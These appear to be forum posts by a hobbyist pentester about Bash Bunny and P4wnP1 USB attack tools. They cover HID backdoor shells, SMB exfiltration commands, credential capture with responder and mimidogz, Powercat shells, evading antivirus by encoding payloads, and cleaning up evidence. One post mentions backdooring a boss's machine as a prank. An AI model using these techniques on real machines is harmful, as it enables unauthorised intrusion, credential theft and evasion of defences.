PoSHMagiC0de

You will have to put that precompiled version of John on it. It only cracks what is in its wordlist using John. It is for cracking simple passwords, nothing fancy with rules though I think you could but man that would put your pi through the ringer. BB already gets pretty warm, John would probably catch it on fire. I have been playing with it and getting it to work with the new raspbian stretch (which it does). I am loving the hidbackdoor. Made a new payload that included it and enabled rndis. My Changed the PID to something random. My win10 machine installed the nic is 3 seconds and hid. I could ping back and forth to the pi and the victim. backdoor payloads worked. FOund a way to fire off scripts using the hid channel and agent and get back results. Loving it. Sat in my living room hacking my win10 machine that is in my bedroom through the pi's wap.

Lol, I hear you. I wanted bluetooth when I saw the supreme duck. This thing is a whole new level. But yeah, it is a BB with wifi support. I would almost say it can be a wireless lan turtle too. if you preprogram the wifi for a nearby hotspot, it will connect when powered up. Apply the patch so it says it is a 20GB nic and you probably could flow traffic through it. Pi zero that is.

NP man. I think the ps1 file as it is will do. That is the script. Just load that and run your commands if it doesn't autorun. You could encapsulate it all in a function called "Invoke-ACLight'. That way in the joblist.json on the command part you can put invoke-aclight as the command to invoke it. Of course with the rest of the function you can add in the collection part. The BBTPS does deliver the path to the SMB path as a variable you can use to assist. They are named $BB_SMBROOT for the path to the root of the bbtps folder in the loot folder on the bash bunny and $BB_SMBLOOT for the folder with the name of the machine inside the bbtps loot folder. Just use them with a join-path and your filename and it will be there. copy-item -path (join-path $BB_SMBROOT "myexe.exe") -destination "c:\localfolder" and copy-item -path $exfiltrationpath -destination $BB_SMBLOOT

The link to the github is here: https://github.com/mame82/P4wnP1 Not my project. I found out about this late last week and it prompted me to order 2 Raspberry Pi Zero Ws. They came in yesterday and before I posted this I wanted to give it a spin. First off, not trying to list any competing projects to Hak5. I own most of their stuff and love it all. This is just additional as each tool has a use depending on what you want to do and how much time you have, etc. P4wnP1 is a project built on the P Zero and Pi Zero W (for the hid_backdoor). The has a few tools like something similar to quickcreds but the system will try and crack them itself with a simple wordlist and if it is guessed it will log into the machine when it is locked. I will let you look at the project github site to see all the things it has, I will talk about its flagship feature. The P4wnP1 was written for Raspian Jessie. Right now stretch is out. So, needless to say there are a few issues but the main one is stuff has to be ran as sudo versus on Jessie things just ran as root. When I first got it all installed I tried it and found this out when i tried to connect to the hid_backdoor shell. It crashed. I had to install pydispatcher and pycrypto with sudo to fix those. Soon I found out the hidserver would not start. These were easy fixes as all I did was edited the bash scripts to include sudo in the right places. After that the hid_backdoor shell works. So, first thing I tried is just sending ducky commands which worked. I then did the hid_backdoor using firestage1 which ran a powershell command on the machine to load the hid shell into the background. No network connection or anything. The server and agent communicate through an hid channel. I been looking at the code and am just floored. Right now it does simple commands which are actually powerful enough when used in combination like launching processes. killing them and interacting with them though I have not been able to interact with a powershell shell I spawn. It also includes a shell you can drop to on the victim that gives you an interactive DOS shell communicating through the hid channel. It leaves itself open for you to script your own payloads as well. Oh, forgot, you connect to it remotely through the Pi Zero W's wifi which is set as an access point on bootup and you ssh into the Pi which drops you into the hidserver app as your shell though you can exit it to the actual pi shell. I used it with my cell phone wifi and an android ssh app to control it while I pranked my boss. If you have pi zero Ws laying around, you have to check out this project.

Speaking of the BBTPS. I got an idea from another project I use on my Pi Zero W. The agent for the BBTPS may become a .NET dll coded in C# that will be loaded reflectively. I hear it reduces the footprint and increases performance, not like it needs a performance boost but it is something to try.

I glanced through that module. It looks like all you need is the ps1 file. Module file just imports all the ps1 files in that folder and I only see 1 so the ACLight.ps1 is the actual file that runs. Issue with it (and understandable why it does it is to conserve memory) is that it creates work files on the drive and ends it with a csv file with your stuff you actually want..unless all those files are what you want. In that case, you can leave the script as is but write a counter script to pickup those files it creates and move them to the BB via SMB or if it is one then you may can read it in as a string and spit it to the output and the BBTPS will take care of delivering back to the job file. You will need to create a config file in the config folder named something to identify the payloads that will be running. Look at the samples to see how they are configured. You will need to create a folder in the jobs folder named after the folder name you put in your config folder. Inside that folder put the script. Inside same folder make a jobs.json file or whatever name you gave it in the config file but it has to be in json format. Look at samples to see format. Last thing you need to do is edit the jobselect.txt file in the root to point to the config file for your payload. Order of running is the payload.txt called jobselect.txt which calls your config that initializes all required environment variables for your jobs. After that it returns to payload.txt to invoke on your config like creating folders, activating attackmodes and running ducky commands to get the agent on the victim when the node server initializes and deliver the jobs listed in the jobs.json file. Data returned on output is sent back to the node server where it is placed in the txt file under your loot folder for that machine under the job name.txt. Other means is to deliver and receive files via SMB. This leads to 2. Yes it can run exes but depends on how you want to run them. Standard way is to have it on the SMB server of the BBTPS and have your script copy it to the machine and run it. If you want it to run separate from the agent you can have a script to copy the exe to the victim and the tell the BBTPS to deliver another script to the agent to be executed as a process to run that file. Last way is if you are really good you could inject it or reflective invoke it depending on how it was compiled. That is an advanced topic too big to discuss here. So, summary. You can use that script but you will need to do manual collection of the results since it drops it to a file unless you change the script to do otherwise. You also will need to do cleanup of anything you don't collect since it will leave evidence. And it can run exes though if it is an exe designed to stay I would run it as a process so it is not inside the BBTPS agent and keep it from ending letting you know it is safe to pull the Bunny.

You may be able to do the same with a wifi extender or a few of these spaced apart. https://eero.com/ The above are wireless mesh devices for extended wifi. Have not tried them.

I can see the confusion with some people and their vision of the Bash Bunny due to it being able to be a keyboard, networkcard, serial or USB storage. Although it seems like it, the extent of the trust the BB has to the system you are plugging into is the extent of access the device you are pretending to be. Let me summarize why you will not be able to do much with a locked machine with the BB. Let say the machine is locked and you wanted to use the BB, lets look at the attack modes and what they can do with a locked machine. HID\Keyboard: On the locked machine, can you do anything from the keyboard that is attached to the machine to launch notepad? If not then BB HID attack mode will not either as it is emulating a keyboard its access to the system is as far as what a keyboard can do. USB Storage: On the locked machine, if you plugged in a USB memory stick, will you be able top launch notepad on the locked machine? If it is updated you shouldn't be able to read that USB stick until you unlock the machine. Also, autorun is disable for USB Storage sticks so no dice there. Network: This can best be described as this. If you hooked a Linux machine onto the network on the same subnet as the victim computer and you have the IP can you make notepad pop up on the victim machine while it is locked? Well, you could if you had the right network credentials to remotely launch it but if you are trying to launch something without unlocked the machine with the BB I am assuming you do not have credentials. The BBs network connections is like that. It is a machine on another subnet on 172.16.64.0/24 network. The BB does not automatically have access inside the machine but has a network connection to it. But logically, it is another machine connected via network to the victim machine so all firewall rules and network rules apply still. The only stuff that will work are network attacks like QuickCreds that uses responder which also work on a PC connected to the same network if we can get the victim to fat finger a resource name not on the internet or on the subnet. So most you can do is fiddle with the network traffic though I have seen locked machine go silent on networks. Serial: If you plug a serial connection between one computer to the victim can you remote control it. Well, you cannot unless there is a service listening on that port that allows you to. Since the com port is created when the driver is installed, that will be a big no. So, the type of attacks you can do are in essence another machine connected logically by traditional connections. The purpose of the BB in a pentest is to execute payloads quickly on a vulnerable machine...most likely one that is unlocked. It uses HID to speedily type commands on the victim machine in combination with the other attack modes for delivery, exfiltration or manipulation. It is up to your imagination what you can do.

So, I saw this on Youtube. https://www.youtube.com/watch?v=FsTeedpYeg4 I immediately thought to myself, the BB would benefit from this. This mode could be a 4th switch position or even an initialize mode like BLUETOOTH_ACTIVE. Of course either way you go it would be a new BB since it would need a Bluetooth module. How many things you would have available through the bluetooth I do not know but the remote control ability of that SupremeDuck made me curious.

I'm curious if this is a stand alone or requires bunny connection to run. Cool feature is to have ti stand alone and run in background, pull the pic, save a copy under a different name and then use a copy of under the original name as the wallpaper. Check in a certain time interval if the wallpaper has been changed from what you had and if so then use the backup to make a copy to the original d/l name and set it as wallpaper again. :-P I would make it a two fer. Get 2 pics, second is the original modified with text saying "and the ponies keep on coming" or "Stampede". That will be the pic that will be set after the first is unset as wallpaper...or tile it :-)

It would be interesting to find out. of course only way would be to get one and play with it. It says it uses GPS. Maybe you can jam it to make it go nuts. Do not know if there is a way to override GPS with your own signal which may be able to spoof it to move by makin it think it is somewhere else. I heard he controlled it from his phone. Is it using a cell data card to connect to a cloud that you connect to to control it or direct connection? If direct then is it bluetooth or wifi? If wifi, is it open or involves the device to login somehow..same goes for bluetooth and if/how it is pairing to your phone. With bluetooth, maybe you can get a pair with it on a laptop? If Wifi, maybe can connect to it with a laptop...similar to the open wifi the dones have/had. Yeah, reusing their software is not considered a security feature unless that is a proven hardened piece of code. If they have a bug in that package then all software they have that package in will have the same bug.

According to the payload this happens when the bash bunny does not get and IP of the machine. This payload looks to be updated to use firmware version 1.3 due to the GET extensions it is using. It also uses responder, so. Your bunny will need to be updated to firmware 1.3. You will need to make sure you have responder installed, see the tools pinned post for the package and installation instructions. With those, the quickcreds should go to yellow until you get creds. Other than that, maybe the machine is failing to install the RNDIS driver. If you are running this on Windows make sure the RNDIS_ETHERNET attack mode is used, not ECM_ETHERNET.

Windows 10 can handle 2 attack modes. I use HID RNDIS_ETHERNET all the time, I just append on RNDIS_SPEED_10000 so Windows 10 uses the REAL network connection to the internet to use Windows update to get the new drivers. May have to do the same with your combo to get drivers.

So, I did extensive testing of this payload. I have a copy of his mimidogz at the totalp0wn payload so I know the script works. 1) If on Windows 10 with creator update, forget it, it will never work. 2) If you are running a virus scanner like Avast this payload in its current condition maybe stopped. Avast I know will stop it. It doesn't stop in the bbtps because I compress and encode it before transfering from the BB to my agent running on the machine, similar to the first script that is pulled down by this payload (ps.md). If you are having issues, try disabling all virus scanners and try again. I seen red on Windows 10 machines when it pulls nothing, Red means it got nothing. Also the quack timings may need to be adjust for the machine you are adding it to. Maybe a little delay between the gui+r to give machine time to bring up run command. Some time after running powershell as admin to allow for powershell to swap and give admin prompt and even time after hitting alt-y. I also bee adding an extra return after the alt-Y pause in case it is one of those machines that do not prompt for admin permission and just runs the command prompt so I can return after my Y and have a clean commandline to run the cradle. Recommendations for improvements. Maybe compressing and encoding md.ps1 before sending it and putting in the p.ps1 file the code to put it back to english and run may help with the virus scanner issues seeing it in transit but test on win7 with all virus scanners off while this payload is in its current condition.

I did more testing with the powercat script in the totalp0wn payload of the bbtps. On Windows 7 machines it works as intended. On a Windows 10 machine it exhibits the behavior you describe with the session opening and then closing by remote host. Hmmm. When I copy the script to the desktop of the windows 10 machine, load it into a variable as a string and invoke it and then run the function it works. I even tried to do the -NoE option but it fails on the bbtps. May have to modify the agent to not hide the process window so I can see what happens. Yeah, the Connect-Powercat2.ps1 script file is that same module on github but I unfactored it so it can be one file and be load and fired off as a payload without touching disk. I planned on doing some docs on the modules in the totalp0wn job list but originally built that joblist as an example of what I would use as a combo payload in the BBTPS. Didn't think it would be popular.

More like a merge. Trying to decide how to decide what db data take presidency. Reason is WIGle db stores the signal strength of the AP while kismet does not what I can tell. In my kismet db the fields for signal strength show zero. I planned on using strength and time to determine if a record is to be updated. I am thinking of making the DB backend that brings them together in MongoDB for flexibility. Maybe after evolution and the structure solidifies I will go to mysql.

So...you don't want to run unix commands without a terminal?

I spent all weekend looking through those payloads figuring out which one I should update. I got overwhelmed. Going to just need people to suggest which one needs looking over the most and start there. Summary. The BB is a Arm machine running linux. It has its root partition that it boots from and a nang (i think it is called that) that is usually mapped as udisk for payloads and exfiltrated data. If you make a payload with just a network connection you can ssh into it and explore it. The BB comes with some helpers for you. Like in the shell it has the udisk command to mount and format the partition that is mounted and payloads are ran from. For the payloads themselves there are helper functions to get you ip address of the bunny and clients, switch position, and hostnames. The wiki has their uses. I looked in the past for a way to run my payloads hidden in linux and found a way but it works best when the payload is encompassed into a script ie python, perl, bash, whatever. The key here is the nohup command in linux. I do not know if it is there in MacOS but I always seen it in linux. If I use it like so against my payload script it will be. nohup bash ./myscript.sh & exit nohup keeps your script from closing when you close the terminal. Of course you can only see the process in "top", if it is still running. It also writes all output to a nohup.not file. I have foudn that while prethinking of a way to make an agent run hidden on linux since I had no takers on writing the python agent for the BBTPS for linux and OSX, I am going to have to do it as soon as I figure out how to run a separate process from python detached from the current python instance (like start-process in powershell for windows).

Because the login name is used as part of the key for the hash. You need the login info, domain too if it was included. Hashes should always include the username they belong to when passed. Do not know why Quickcreds is not getting it.

I been tinkering around with an idea I plan on writing in python. It is to query and handle the sqllite files handled by kismet and WiGle for the android. Want to be able to combine them into 1 common database and more open query options to export results to kml files.

Nope. That is making the folders on the local BB to gather the loot in.

And if you need third party I have heard some good things from KnowBe4. Have not used them myself but have a friend who is engineer at company that does and he boasted about them and their phishing templates.

I am thinking @ccolins should do the video for the BBTPS. From what I read above he has it down pack.

Weird. I combined all the modules for the original Powercat to one so it can run directly from download and the BBTPS should be firing it off as a separate process so the BB ending should not affect it. Pretty much followed what the command that deploys netcat as a payload to build it. I will have to test it again to see this but it should be loaded the minute you run it in memory. Yeah, I like Powercat. I use it on Windows machines sometimes to scan for ports and stuff when I do not want to run netcat on windows. Plus sometimes the Self contained deployment of netcat is detected as malicious by some virus scanners.

I use the daniel miessler seclists too. I usually remove the lists with counts and I already cleaned up the darkc0de list of the counts before adding it to my main list a year ago. I then use dymerg to combine them all into a new list that is sorted and unique and then combine that with my master. I do this every once in awhile and any cracked passwords that was cracked by a rulelist I add to the list. My 970 only pulls 113kHs on wpa. I see wpa really drags down the system even with 2 1070s compared to the other hashes. Awesome.